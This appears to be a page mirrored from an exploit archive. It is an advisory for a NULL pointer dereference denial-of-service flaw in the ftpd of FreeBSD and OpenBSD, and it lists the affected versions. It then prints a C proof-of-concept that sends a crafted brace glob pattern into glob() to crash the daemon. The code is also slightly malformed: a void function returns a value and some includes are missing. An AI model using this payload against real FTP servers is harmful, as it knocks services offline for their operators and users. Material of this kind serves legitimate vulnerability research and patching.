Home / os / winme

FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereferenc

Posted on 08 March 2010

=================================================================================== FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability =================================================================================== Vulnerable: OpenBSD OpenBSD 4.6 FreeBSD ftpd 0 FreeBSD FreeBSD 4.9 -RELENG FreeBSD FreeBSD 4.9 -PRERELEASE FreeBSD FreeBSD 4.9 FreeBSD FreeBSD 8.0-STABLE FreeBSD FreeBSD 8.0-RELEASE FreeBSD FreeBSD 6.3-RELEASE-p11 FreeBSD FreeBSD 6.3-RELEASE-p10 FreeBSD FreeBSD 6.3 -RELENG FreeBSD FreeBSD 6.3 -RELEASE-p9 FreeBSD FreeBSD 6.3 -RELEASE-p8 FreeBSD FreeBSD 6.3 -RELEASE-p6 FreeBSD FreeBSD 6.3 #include <glob.h> #include <stdio.h> #define MAXUSRARGS 100 #define MAXGLOBARGS 1000 void do_glob() { glob_t gl; char **pop; char buffer[256]; strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}"); int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE; memset(&gl, 0, sizeof(gl)); gl.gl_matchc = MAXGLOBARGS; flags |= GLOB_LIMIT; if (glob(buffer, flags, NULL, &gl)) { printf("GLOB FAILED! "); return 0; } else // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1); for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1); pop++) { printf("glob success"); return 0; } globfree(&gl); } main(int argc, char **argv) { do_glob(); do_glob(); } # ~ - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :